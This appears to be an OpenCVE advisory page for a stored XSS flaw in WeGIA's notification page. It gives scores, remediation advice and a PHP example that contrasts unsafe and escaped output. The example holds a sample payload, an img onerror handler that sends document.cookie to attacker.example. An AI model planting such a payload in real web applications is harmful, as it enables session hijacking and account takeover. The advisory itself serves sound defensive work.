Description
WeGIA is a web manager for charitable institutions. In versions prior to 3.6.10, a Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the Intercorrências notification page, which is executed when a user accesses the page, enabling session hijacking and account takeover. Version 3.6.10 fixes the issue.
Published: 2026-04-17
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Account Takeover
Action: Immediate Patch
AI Analysis

Impact

This vulnerability is a stored cross-site scripting flaw in the intercorrencia_visualizar.php page. An authenticated user can submit malicious JavaScript that is stored and later executed in the browser of anyone who views the notification page. The injected script runs with the viewer's session, so it can hijack that session and take over the account, compromising the confidentiality and integrity of whatever data and actions that account can reach.

Affected Systems

The affected product is the WeGIA web manager from LabRedesCefetRJ. Versions prior to 3.6.10 contain the flaw. Users of any earlier releases should verify their installed version.

Risk and Exploitability

The CVSS 4.0 base score of 6.4 places this issue in the medium range. EPSS is below 1% and the vulnerability is not listed in the CISA KEV catalog, so there is no confirmed exploitation at this time. Note a tension in the published data: the description says an authenticated user plants the payload, while the CVSS vector records PR:N (no privileges required) and UI:A (active user interaction); read the authentication requirement as the bar for storing the script, not for being a victim. An attacker with any valid account stores the payload once, after which every user who opens the notification page executes it, so the realistic target is the session of a higher-privileged user who reviews intercorrências. That cross-user reach is what the SC:H/SI:H/SA:H subsequent-system impact in the vector reflects. The attack vector is an ordinary authenticated web session submitting a crafted notification.

Generated by OpenCVE AI on April 18, 2026 at 17:07 UTC.

Remediation

Vendor fix: upgrade to WeGIA 3.6.10 or later, which the advisory states resolves the issue. No workaround for earlier versions has been published by the vendor.

OpenCVE Recommended Actions

  • Upgrade WeGIA to version 3.6.10 or later; this is the only vendor-provided fix for the stored XSS vulnerability.
  • Until the upgrade is applied, restrict both sides of the flaw: limit which accounts can create or edit intercorrências (any of them can plant the payload) and which accounts can open intercorrencia_visualizar.php (any of them can become a victim); disable the page for less trusted users if possible.
  • Apply contextual output encoding (HTML-escaping the stored fields at the point where the page renders them) rather than relying on input filtering alone, and deploy a Content Security Policy that disallows inline scripts so an injected handler cannot execute even where an encoding call is missed. Mark the session cookie HttpOnly so a script that does run cannot read it with document.cookie; this limits cookie theft but does not stop the script from acting with the victim's session, so it is a mitigation, not a fix.
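The defect class behind this CVE and the mitigations listed above, as an added PHP example that is not WeGIA's code: the row shape, the field name `descricao`, the function names and the attacker-controlled payload are all constructed here for illustration, and nothing below is taken from intercorrencia_visualizar.php itself.

```php
<?php
// Added illustrative example, not WeGIA's own code. Shows the CWE-79 defect
// class behind this CVE (a stored field echoed into HTML without encoding)
// next to the hardened rendering, plus the two defence-in-depth controls
// recommended above: a CSP that forbids inline script and an HttpOnly session
// cookie. Field names, function names and the payload are assumptions.
declare(strict_types=1);

// Constructed sample row, standing in for a record the notification page
// reads back from the database after another user has submitted it.
$intercorrencia = [
    'id'        => 42,
    'descricao' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

/** Vulnerable pattern: the stored value is concatenated straight into markup. */
function renderUnsafe(array $row): string
{
    return '<div class="intercorrencia">' . $row['descricao'] . '</div>';
}

/** HTML-body-context encoder; attribute values, URLs and JS contexts need their own. */
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Hardened pattern: encode at output time, so the browser sees inert text. */
function renderSafe(array $row): string
{
    return '<div class="intercorrencia">' . esc($row['descricao']) . '</div>';
}

/**
 * Defence in depth: with a per-response nonce, only <script> tags the page
 * itself emits with that nonce may run; inline handlers such as onerror=...
 * are refused by the browser even if an encoding call is missed somewhere.
 */
function cspHeader(string $nonce): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'nonce-$nonce'; "
         . "object-src 'none'; base-uri 'self'";
}

// Limit what a script that does run can steal: HttpOnly keeps the session id
// out of document.cookie. It does not stop the script from driving the app
// with the victim's session, so this is a mitigation, not a fix.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);

$nonce = base64_encode(random_bytes(16));

echo "Unsafe output (payload reaches the browser as markup):\n";
echo renderUnsafe($intercorrencia), "\n\n";
echo "Safe output (payload rendered as inert text):\n";
echo renderSafe($intercorrencia), "\n\n";
echo "Header to send before any body output:\n";
echo cspHeader($nonce), "\n";
```

Run it with `php example.php`: the first block prints the `<img ... onerror=...>` element verbatim, which a browser would execute; the second prints it as `&lt;img ...&gt;`, which a browser renders as text. In a real page the header goes out via `header(cspHeader($nonce))` before any output, and every `<script>` the page legitimately emits must carry `nonce="..."` with the same value, otherwise the policy breaks the page's own scripts as well as the injected one.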



Advisories

No advisories yet.

History

Fri, 17 Apr 2026 21:45:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Labredescefetrj; Labredescefetrj wegia
Vendors & Products                     Labredescefetrj; Labredescefetrj wegia

Fri, 17 Apr 2026 20:30:00 +0000

Type          Values Removed   Values Added
Description                    WeGIA is a web manager for charitable institutions. In versions prior to 3.6.10, a Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the Intercorrências notification page, which is executed when a user accesses the page, enabling session hijacking and account takeover. Version 3.6.10 fixes the issue.
Title                          WeGIA has stored XSS in intercorrencia_visualizar.php
Weaknesses                     CWE-79
References
Metrics                        cvssV4_0 {'score': 6.4, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-17T20:23:13.483Z

Reserved: 2026-04-10T20:22:44.035Z

Link: CVE-2026-40282

Vulnrichment

No data.

NVD

Status: Received

Published: 2026-04-17T21:16:34.007

Modified: 2026-04-17T21:16:34.007

Link: CVE-2026-40282

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T17:15:05Z

Weaknesses